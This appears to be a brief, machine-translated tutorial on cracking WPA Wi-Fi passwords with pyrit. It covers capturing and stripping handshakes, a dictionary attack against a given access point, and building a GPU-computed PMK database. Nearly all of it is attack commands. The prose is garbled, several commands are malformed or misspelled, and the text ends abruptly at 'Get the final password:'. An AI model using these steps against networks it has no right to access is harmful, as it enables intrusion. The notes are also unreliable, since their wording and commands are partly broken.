Advantage:
GPU acceleration operation can be generated using PMK
Ethereal get itself supports five four-step process, with no need to get caught Airodump
Also supports the traditional reading airodump capture obtain four-step handshake
Just grab bag WAP four-way handshake process
pyrit -r wlan0mon -o wpapyrit.cap sripLive # -o generating handshake sripLive remove unwanted data packets
pyrit -r wpapyrit.cap analyze analyzed to see if there is handshake
Grasping hand may be introduced and screened packet (packet airodump caught and pyrit not the same format, data conversion is required prior to use) from airodump
-r -o pyrite wpa.cap wpapyrit.cap strip
Use a password dictionary direct analysis (slower)
pyrit -r wpapyrit.cap -i /usr/share/john/password.lst -b 00: 11: 22: 33: 44: 55 attack_passthrough # -r used handshake packet -b MAC address of the AP
Use the database to crack:
1. Check the default database status: pyrit eval
2. Import password dictionary (automatically remove invalid password): pyrit -i password.lst import passwords
3.指定ESSID:pyrit -e TP_Link722 create essid
4. Calculate the PMK: pyrit batch (enabled by default GPU)
5. Analysis Password: pyrit -r wpapyrit.cap -b 00: 11: 22: 33: 44: 55 attack.db
Get the final password: